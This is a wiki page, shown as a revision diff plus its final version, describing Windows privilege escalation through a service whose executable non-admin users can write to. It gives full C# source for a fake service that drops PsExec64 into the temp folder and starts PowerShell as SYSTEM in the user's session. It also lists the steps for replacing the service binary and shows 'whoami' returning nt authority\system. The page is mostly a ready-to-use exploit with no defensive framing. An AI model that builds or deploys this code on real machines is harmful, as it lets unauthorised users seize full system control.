« Privilege escalation » : différence entre les versions

De Banane Atomic
Aller à la navigationAller à la recherche
 
(5 versions intermédiaires par le même utilisateur non affichées)
Ligne 2 : Ligne 2 :
= [https://blog.didierstevens.com/2017/09/05/abusing-a-writable-windows-service/ With a writable Windows service] =
= [https://blog.didierstevens.com/2017/09/05/abusing-a-writable-windows-service/ With a writable Windows service] =
If the executable of a Windows service is writable by non-admin users, you can replace it with another executable that will launch a command prompt in the system account.
If the executable of a Windows service is writable by non-admin users, you can replace it with another executable that will launch a command prompt in the system account.
<filebox fn='FakeService.cs'>
public class FakeService : ServiceBase
{
    protected override void OnStart(string[] args)
    {
        Thread.Sleep(10000);  // wait 10s for the user to log and Windows to start
        var psExecPath = ExtractPsExec();  // extract the PsExec.exe file
        var powershellPath = @"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe";
        // Windows services run in session 0 and user account runs in session 1.
        // use sysinternals' PsExec to run cmd.exe in session 1.
        Process.Start(psExecPath, $"-accepteula -d -i 1 {powershellPath}");
        // stop the service after 1s
        Thread.Sleep(1000);
        new Thread(() => this.Stop()).Start();
    }
    private string ExtractPsExec()
    {
        var psExecPath = Path.Combine(Path.GetTempPath(), "PsExec64.exe"); // temp path: C:\Windows\Temp
        if (!File.Exists(psExecPath))
            File.WriteAllBytes(psExecPath, Resources.PsExec64);
        return psExecPath;
    }
}
</filebox>


<filebox fn='Program.cs'>
<filebox fn='Program.cs'>
 
class Program
{
    static void Main(string[] args)
    {
        ServiceBase.Run(new ServiceBase[] { new FakeService() });
    }
}
</filebox>
</filebox>


Replace the executable of the Windows service by the compiled application.<br>
# Replace the executable of the Windows service by the compiled application.
A command prompt will be launched when the Windows service will start.
# A command prompt will be launched when the Windows service starts.
<kode lang='dos'>
<kode lang='dos'>
whoami
whoami
REM nt authority\system
REM nt authority\system
</kode>
</kode>

Dernière version du 20 février 2022 à 16:07

With a writable Windows service

If the executable of a Windows service is writable by non-admin users, you can replace it with another executable that will launch a command prompt in the system account.

FakeService.cs
public class FakeService : ServiceBase
{
    protected override void OnStart(string[] args)
    {
        Thread.Sleep(10000);  // wait 10s for the user to log and Windows to start

        var psExecPath = ExtractPsExec();  // extract the PsExec.exe file
        var powershellPath = @"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe";

        // Windows services run in session 0 and user account runs in session 1.
        // use sysinternals' PsExec to run cmd.exe in session 1.
        Process.Start(psExecPath, $"-accepteula -d -i 1 {powershellPath}");

        // stop the service after 1s
        Thread.Sleep(1000);
        new Thread(() => this.Stop()).Start();
    }

    private string ExtractPsExec()
    {
        var psExecPath = Path.Combine(Path.GetTempPath(), "PsExec64.exe"); // temp path: C:\Windows\Temp

        if (!File.Exists(psExecPath))
            File.WriteAllBytes(psExecPath, Resources.PsExec64);

        return psExecPath;
    }
}
Program.cs
class Program
{
    static void Main(string[] args)
    {
        ServiceBase.Run(new ServiceBase[] { new FakeService() });
    }
}
  1. Replace the executable of the Windows service by the compiled application.
  2. A command prompt will be launched when the Windows service starts.
Dos.svg
whoami
REM nt authority\system